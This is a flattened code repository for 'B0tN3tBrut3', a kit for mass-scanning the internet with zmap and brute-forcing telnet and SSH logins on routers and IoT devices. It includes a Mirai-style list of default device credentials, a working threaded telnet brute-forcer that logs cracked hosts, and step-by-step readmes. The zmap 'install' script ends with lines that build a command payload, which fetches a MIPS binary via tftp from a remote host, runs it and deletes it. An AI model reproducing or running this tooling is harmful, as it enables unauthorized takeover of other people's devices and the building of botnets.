├── lul.png ├── lul2.png ├── sshbrute ├── Debian|Ubuntu_zmap_auto_install.sh ├── README.md ├── ScannerInstall.sh ├── ReadmeTelnet.md ├── ReadmeSsh.md ├── CentOS_zmap_auto_install.sh ├── pass_file └── TelnetBrute.py /lul.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/YourAnonXelj/B0tN3tBrut3/HEAD/lul.png -------------------------------------------------------------------------------- /lul2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/YourAnonXelj/B0tN3tBrut3/HEAD/lul2.png -------------------------------------------------------------------------------- /sshbrute: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/YourAnonXelj/B0tN3tBrut3/HEAD/sshbrute -------------------------------------------------------------------------------- /Debian|Ubuntu_zmap_auto_install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Debian ZMap Install 4 | 5 | apt-get update -y 6 | 7 | apt-get install build-essential cmake libgmp3-dev gengetopt libpcap-dev flex byacc libjson-c-dev pkg-config libunistring-dev -y 8 | 9 | apt-get install zmap -y 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # B0tN3tBrut3 2 | Brute force tool for telnet and ssh, programmed in python (with Zmap) 3 | 4 | Usage: Read ReadmeTelnet.md & ReadmeSsh.md 5 |
6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | -------------------------------------------------------------------------------- /ScannerInstall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo -e "\e[1;32mInstalando dependencias" 3 | yum install cpan wget curl glibc.i686 -y 4 | cpan force install Parallel::ForkManager 5 | cpan force install IO::Socket 6 | cpan force install IO::Select 7 | sleep 2 8 | yum install gcc php-devel php-pear libssh2 libssh2-devel libpcap -y 9 | pecl install -f ssh2 10 | touch /etc/php.d/ssh2.ini 11 | echo extension=ssh2.so > /etc/php.d/ssh2.ini 12 | echo -e "\e[1;36mTodo listo para sshbrute" 13 | -------------------------------------------------------------------------------- /ReadmeTelnet.md: -------------------------------------------------------------------------------- 1 | [VPS CentOS 6.9/6.8] (Recomendado) 2 | 3 | - Install zmap 4 | 5 | 1- sh CentOS_zmap_auto_install.sh OR Debian_zmap_auto_install.sh 6 | 7 | - Scan Telnet Ips 8 | 9 | 1- ulimit -n 999999 10 | 11 | 2- zmap -p23 -o mfutelnet.txt -N 250000 12 | 13 | 1,5-(optional) zmap -p23 -o mfutelnet.txt -w telnet.lst 14 | 15 | - Bruteforce 16 | 17 | 2- ulimit -n 999999 18 | 19 | 3- python TelnetBrute.py mfutelnet.txt 15000 telnettest.txt 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | Video: https://www.youtube.com/embed/ZOCRpKSFLfs 29 | -------------------------------------------------------------------------------- /ReadmeSsh.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | (CentOS 6.9) 4 | 5 | 6 | - git clone https://github.com/YourAnonXelj/B0tN3tBrut3.git 7 | 8 | 9 | 10 | 11 | 1- sh CentOS_zmap_auto_install.sh 12 | 13 | - si te sale el error "zmap: command not found" 14 | 15 | - pon este comando export PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin" 16 | 17 | 2- sh ScannerInstall.sh 18 | 19 | 3- zmap -p22 -o mfu.txt -N 250000 //-// not mfu2.txt or mfulol.txt dont change 20 | 21 | 4- chmod 777 * 22 | 23 | 5- ./sshbrute 2500 24 | 25 | Result = vuln.txt 26 | 27 | 28 | -------------------------------------------------------------------------------- /CentOS_zmap_auto_install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # CentOS ZMap Install 3 | 4 | yum update -y 5 | yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y 6 | yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y 7 | yum install epel-release -y 8 | yum install gengetopt -y 9 | 10 | wget https://github.com/zmap/zmap/archive/v2.1.0.tar.gz 11 | tar -xvf v2.1.0.tar.gz 12 | cd zmap-2.1.0 13 | flex -o "src/lexer.c" --header-file="src/lexer.h" "src/lexer.l" 14 | byacc -d -o "src/parser.c" "src/parser.y" 15 | mkdir /etc/zmap 16 | cp conf/* /etc/zmap 17 | cmake -DENABLE_HARDENING=ON 18 | make 19 | make install 20 | 21 | python -c "print 'A'*8 + 'netcore\x00'" > loginpayload 22 | python -c "print 'AA\x00\x00AAAA cd /var/; tftp -g -r mipselss 1.1.1.1; chmod 777 mipsel; ./mipsel; rm -rf mipsel\x00'" > commandpayload 23 | -------------------------------------------------------------------------------- /pass_file: -------------------------------------------------------------------------------- 1 | ubnt ubnt 2 | 1234 1234 3 | usuario usuario 4 | support support 5 | admin admin1234 6 | root root 7 | admin admin 8 | daemon daemon 9 | root vizxv 10 | root pass 11 | root anko 12 | root xc3511 13 | default default 14 | supervisor zyad1234 15 | root 5up 16 | default lJwpbo6 17 | User admin 18 | guest 12345 19 | guest password 20 | root zlxx. 21 | admin 1234 22 | admin 12345 23 | telnet telnet 24 | admin 1234567 25 | admin password 26 | root 88888888 27 | root klv1234 28 | root Zte521 29 | root hi3518 30 | root jvbzd 31 | root 7ujMko0vizxv 32 | root 7ujMko0admin 33 | root ikwb 34 | root dreambox 35 | root user 36 | root realtek 37 | root 00000000 38 | admin 1111111 39 | admin 54321 40 | admin 123456 41 | default 123456 42 | default S2fGqNFs 43 | default OxhlwSG8 44 | default antslq 45 | default tlJwpbo6 46 | root default 47 | default pass 48 | default 12345 49 | default password 50 | root taZz@23495859 51 | root 20080826 52 | admin 7ujMko0admin 53 | root gforge 54 | root zsun1188 55 | admin synnet 56 | root t0talc0ntr0l4! 57 | guest 1111 58 | root admin1234 59 | root tl789 60 | admin fliradmin 61 | root 12345678 62 | root 1234567890 63 | root vertex25ektks123 64 | root admin@mymifi 65 | admin 7ujMko0admin 66 | admin pass 67 | admin meinsm 68 | admin admin1234 69 | root 1111 70 | admin 1111 71 | root 666666 72 | root klv123 73 | Administrator admin 74 | service service 75 | supervisor supervisor 76 | guest 12345 77 | admin1 password 78 | administrator 1234 79 | 666666 666666 80 | 888888 888888 81 | tech tech 82 | admin dvr2580222 83 | ubnt ubnt 84 | user 12345 85 | admin aquario 86 | root zsun1188 87 | default lJwpbo6 88 | guest guest 89 | user user 90 | root Zte521 91 | root abc123 92 | root admin 93 | root xc3511 94 | root Serv4EMC 95 | root zsun1188 96 | root 123456 97 | default OxhlwSG8 98 | default S2fGqNFs 99 | admin smcadmin 100 | admin adslnadam 101 | sysadm sysadm 102 | support support 103 | root default 104 | root password 105 | root cat1029 106 | admin cat1029 107 | admin 123456 108 | root antslq -------------------------------------------------------------------------------- /TelnetBrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #By Xelj 3 | import threading 4 | import sys, os, re, time, socket 5 | from Queue import * 6 | from sys import stdout 7 | 8 | if len(sys.argv) < 4: 9 | print "Usage: python "+sys.argv[0]+" " 10 | sys.exit() 11 | 12 | combo = [ 13 | "root:root", 14 | "admin:admin", 15 | "admin:ADMIN", 16 | "daemon:daemon", 17 | "root:vizxv", 18 | "root:pass", 19 | "root:anko", 20 | "root:1234", 21 | "root:", 22 | "admin:", 23 | "root:xc3511", 24 | "root:juantech", 25 | "default:", 26 | "default:default", 27 | "supervisor:zyad1234", 28 | "root:5up", 29 | "default:lJwpbo6", 30 | "daemon:", 31 | "adm:", 32 | "default:default", 33 | "root:696969", 34 | "root:1234567", 35 | "User:admin", 36 | "guest:12345", 37 | "guest:password", 38 | "root:zlxx.", 39 | "root:1001chin", 40 | "root:hunt5759", 41 | "admin:true", 42 | "admin:changeme", 43 | "baby:baby", 44 | "root:xc3511", 45 | "root:xmhdipc", 46 | "root:12341234", 47 | "root:ttnet", 48 | "root:Serv4EMC", 49 | "default:S2fGqNFs", 50 | "default:OxhlwSG8", 51 | "default:lJwpbo6", 52 | "vstarcam2015:20150602", 53 | "root:zsun1188", 54 | "admin:meinsm", 55 | "admin:adslnadam", 56 | "root:ipcam_rt5350", 57 | "Menara:Menara", 58 | "admin:ho4uku6at", 59 | "root:t0talc0ntr0l4!", 60 | "admin:gvt12345", 61 | "admin:dvr2580222", 62 | "root:hi3518", 63 | "root:ikwb", 64 | "admin:ip3000", 65 | "admin:1234", 66 | "admin:12345", 67 | "telnet:telnet", 68 | "admin:1234567", 69 | "root:system", 70 | "admin:password", 71 | "root:888888", 72 | "root:88888888", 73 | "root:klv1234", 74 | "root:Zte521", 75 | "root:hi3518", 76 | "root:jvbzd", 77 | "root:7ujMko0vizxv", 78 | "root:7ujMko0admin", 79 | "root:dreambox", 80 | "root:user", 81 | "root:realtek", 82 | "root:00000000", 83 | "admin:1111111", 84 | "admin:54321", 85 | "admin:123456", 86 | "default:123456", 87 | "default:S2fGqNFs", 88 | "default:OxhlwSG8", 89 | "default:antslq", 90 | "default:tlJwpbo6", 91 | "root:default", 92 | "default:pass", 93 | "default:12345", 94 | "default:password", 95 | "root:taZz@23495859", 96 | "root:20080826", 97 | "admin:7ujMko0admin", 98 | "root:gforge", 99 | "root:zsun1188", 100 | "admin:synnet", 101 | "root:t0talc0ntr0l4!", 102 | "guest:1111", 103 | "root:admin1234", 104 | "root:tl789", 105 | "admin:fliradmin", 106 | "root:12345678", 107 | "root:1234567890", 108 | "root:vertex25ektks123", 109 | "root:admin@mymifi", 110 | "admin:7ujMko0admin", 111 | "admin:pass", 112 | "admin:meinsm", 113 | "admin:admin1234", 114 | "admin:smcadmin", 115 | "root:1111", 116 | "admin:1111", 117 | "root:54321", 118 | "root:666666", 119 | "root:klv123", 120 | "Administrator:admin", 121 | "service:service", 122 | "supervisor:supervisor", 123 | "guest:12345", 124 | "admin1:password", 125 | "administrator:1234", 126 | "666666:666666", 127 | "888888:888888", 128 | "tech:tech", 129 | "admin:dvr2580222", 130 | "ubnt:ubnt", 131 | "user:12345", 132 | "admin:aquario", 133 | "root:zsun1188", 134 | "default:lJwpbo6", 135 | "guest:guest", 136 | "guest:12345", 137 | "user:user", 138 | "root:Zte521", 139 | "root:abc123", 140 | "root:admin", 141 | "root:xc3511", 142 | "root:Serv4EMC", 143 | "root:zsun1188", 144 | "root:123456", 145 | "default:OxhlwSG8", 146 | "default:S2fGqNFs", 147 | "admin:smcadmin" 148 | "admin:adslnadam", 149 | "sysadm:sysadm", 150 | "support:support", 151 | "root:default", 152 | "root:password", 153 | "adm:", 154 | "bin:", 155 | "daemon:", 156 | "root:cat1029", 157 | "admin:cat1029", 158 | "Alphanetworks:wrgg19_c_dlwbr_dir300", 159 | "Alphanetworks:wrgn49_dlob_dir600b", 160 | "Alphanetworks:wrgn23_dlwbr_dir600b", 161 | "Alphanetworks:wrgn22_dlwbr_dir615", 162 | "Alphanetworks:wrgnd08_dlob_dir815", 163 | "Alphanetworks:wrgg15_di524", 164 | "Alphanetworks:wrgn39_dlob.hans_dir645", 165 | "Alphanetworks:wapnd03cm_dkbs_dap2555", 166 | "Alphanetworks:wapnd04cm_dkbs_dap3525", 167 | "Alphanetworks:wapnd15_dlob_dap1522b", 168 | "Alphanetworks:wrgac01_dlob.hans_dir865", 169 | "Alphanetworks:wrgn23_dlwbr_dir300b", 170 | "Alphanetworks:wrgn28_dlob_dir412", 171 | "Alphanetworks:wrgn39_dlob.hans_dir645_V1" 172 | "admin:123456", 173 | "mother:fucker", 174 | "root:antslq", 175 | ] 176 | 177 | ips = open(sys.argv[1], "r").readlines() 178 | threads = int(sys.argv[2]) 179 | output_file = sys.argv[3] 180 | queue = Queue() 181 | queue_count = 0 182 | 183 | for ip in ips: 184 | queue_count += 1 185 | stdout.write("\r[%d] Coded By Xelj" % queue_count) 186 | stdout.flush() 187 | queue.put(ip) 188 | print "\n" 189 | 190 | 191 | class router(threading.Thread): 192 | def __init__ (self, ip): 193 | threading.Thread.__init__(self) 194 | self.ip = str(ip).rstrip('\n') 195 | def run(self): 196 | username = "" 197 | password = "" 198 | for passwd in combo: 199 | if ":n/a" in passwd: 200 | password="" 201 | else: 202 | password=passwd.split(":")[1] 203 | if "n/a:" in passwd: 204 | username="" 205 | else: 206 | username=passwd.split(":")[0] 207 | try: 208 | tn = socket.socket() 209 | tn.settimeout(8) 210 | tn.connect((self.ip,23)) 211 | except Exception: 212 | tn.close() 213 | break 214 | try: 215 | hoho = '' 216 | hoho += readUntil(tn, "ogin:") 217 | if "ogin" in hoho: 218 | tn.send(username + "\n") 219 | time.sleep(0.09) 220 | except Exception: 221 | tn.close() 222 | try: 223 | hoho = '' 224 | hoho += readUntil(tn, "assword:") 225 | if "assword" in hoho: 226 | tn.send(password + "\n") 227 | time.sleep(0.8) 228 | else: 229 | pass 230 | except Exception: 231 | tn.close() 232 | try: 233 | prompt = '' 234 | prompt += tn.recv(40960) 235 | if ">" in prompt and "ONT" not in prompt: 236 | success = True 237 | elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt: 238 | success = True 239 | else: 240 | tn.close() 241 | if success == True: 242 | try: 243 | os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai 244 | print "\033[37m[\033[32m+\033[37m] \033[33mRoted \033[37m-> \033[32m%s\033[37m:\033[32m%s\033[37m:\033[33m%s\033[37m"%(username, password, self.ip) 245 | tn.close() 246 | break 247 | except: 248 | tn.close() 249 | else: 250 | tn.close() 251 | except Exception: 252 | tn.close() 253 | 254 | def readUntil(tn, string, timeout=8): 255 | buf = '' 256 | start_time = time.time() 257 | while time.time() - start_time < timeout: 258 | buf += tn.recv(1024) 259 | time.sleep(0.01) 260 | if string in buf: return buf 261 | raise Exception('TIMEOUT!') 262 | 263 | def worker(): 264 | try: 265 | while True: 266 | try: 267 | IP = queue.get() 268 | thread = router(IP) 269 | thread.start() 270 | queue.task_done() 271 | time.sleep(0.02) 272 | except: 273 | pass 274 | except: 275 | pass 276 | 277 | for l in xrange(threads): 278 | try: 279 | t = threading.Thread(target=worker) 280 | t.start() 281 | except: 282 | pass 283 | --------------------------------------------------------------------------------